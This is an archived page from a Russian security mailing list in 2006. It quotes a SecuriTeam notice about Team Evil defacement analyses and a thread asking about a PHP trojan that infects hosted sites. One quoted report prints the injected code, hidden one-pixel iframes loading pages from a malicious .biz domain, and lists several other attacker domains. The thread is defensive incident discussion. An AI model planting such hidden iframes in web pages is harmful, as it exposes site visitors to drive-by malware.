ПРОЕКТЫ 

  АРХИВ 

Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

  СТАТЬИ 

  ПЕРСОНАЛЬНОЕ 

  ПРОГРАММЫ 

ПИШИТЕ
ПИСЬМА














     АРХИВ :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [security-alerts] PHP trojan?

Наверное, Михаил имел в виду этот мой постинг
----------
> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx] 
> Sent: Monday, November 13, 2006 6:56 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NEWS] Team Evil - Incident #2
> 
> 
> Team Evil - Incident #2 
> 
> 
> 
> A followup document on Team Evil's methodology to attack and 
> deface sites as well as how such attacks can be investigated, 
> has been released today by Beyond Security's beSIRT. 
> 
> 
> Earlier this year, Beyond Security's beSIRT released an 
> incident response forensic analysis of a defacement attack by 
> Team Evil [Team Evil Incident (Cyber-terrorism defacement 
> analysis and response) 
> <http://blogs.securiteam.com/index.php/archives/510> ]. The 
> PDF itself can be found here: 
> 
> http://www.beyondsecurity.com/besirt/advisories/team-evil-inci
> dent.pdf 
> 
> A follow up is being released today, on a second incident. 
> Following what Team Evil did, their methodology and how it 
> changed since the first document was released. 
> 
> The aim of this document is more to show how such analysis is 
> done, on an educational note. The PDF can be found here: 
> 
> http://beyondsecurity.com/besirt/advisories/teamevil-incident2.pdf 
> 
> We hope you find this useful. 
> 
> 
> Additional Information: 
> 




> -----Original Message-----
> From: 3APA3A [mailto:3APA3A@xxxxxxxxxxxxxxxx] 
> Sent: Wednesday, December 20, 2006 12:36 PM
> To: Michael Tokarev
> Cc: security-alerts@xxxxxxxxxxxxxx
> Subject: Re: [security-alerts] PHP trojan?
> 
> Dear Michael Tokarev,
> 
>  Ну  вообще-то  факт,  что  кто-то  через php shell на одном 
> сайте может
>  что-то  сделать  с  другими  сайтами указывает на 
> существенную кривизну
>  чьих-то рук.
> 
>  Троянцев/вирусов  меняющих  все  HTML/ASP/PHP файлы, которые 
> они смогли
>  найти достаточно много. Но для этого надо, чтобы его через 
> IE загрузили
>  с той машины, где эти файлы лежат.
> 
>  Еще  некоторое  время назад был червяк, ползающий по дырявым 
> phpBB. Это
>  было давно и неактуально.
> 
>  В данном случае речь явно идет об атаке либо на сам хостинг 
> либо на его
>  движок.
> 
> --Wednesday, December 20, 2006, 12:13:44 PM, you wrote to 
> security-alerts@xxxxxxxxxxxxxx:
> 
> MT> Я недавно где-то видел информацию о трояне, эксплуатирующем
> MT> php-сайты, но не могу найти.  Почему-то мне кажется, что она
> MT> проходила в этом списке...
> 
> MT> Короче:
> 
> MT> <quote>
> MT> On another note, we've been dealing with some crazy 
> hakcers on many of our
> MT> servers. They come in via php backdoors or insecure php 
> scripts and infect
> MT> all sites with something like
> MT> <iframe src='http://dgfjhewfndsbfsdvf.biz/adv/167/new.php' width=1
> MT> height=1></iframe><iframe
> MT> src='http://dgfjhewfndsbfsdvf.biz/adv/new.php?adv=167' width=1
> MT> height=1></iframe>
> 
> MT> The domain has changed a few times in the last few 
> months, but it always
> MT> ends in .biz and is in that format. Its been a real 
> struggle with these
> MT> guys, many of our clients are getting hacked.
> 
> MT> Some of the other domains they've used are
> MT> wsfgfdgrtyhgfd.net
> MT> uniqcount.net
> MT> megacount.net
> 
> MT> any help is greatly appreciated, i've been up all night 
> fighting it
> MT> Thanks.
> MT> </quote>
> 
> MT> Тут два момента.
> MT>  1) собственно троян, и
> MT>  2) эти домены ведут в Москву.
> MT> Кто-то может что-то сказать?
> 
> MT> /mjt
> 
> 
> 
> -- 
> ~/ZARAZA
> Всегда будем рады послушать ваше чириканье (Твен)
> 
> 
>

 



Copyright © Lexa Software, 1996-2009.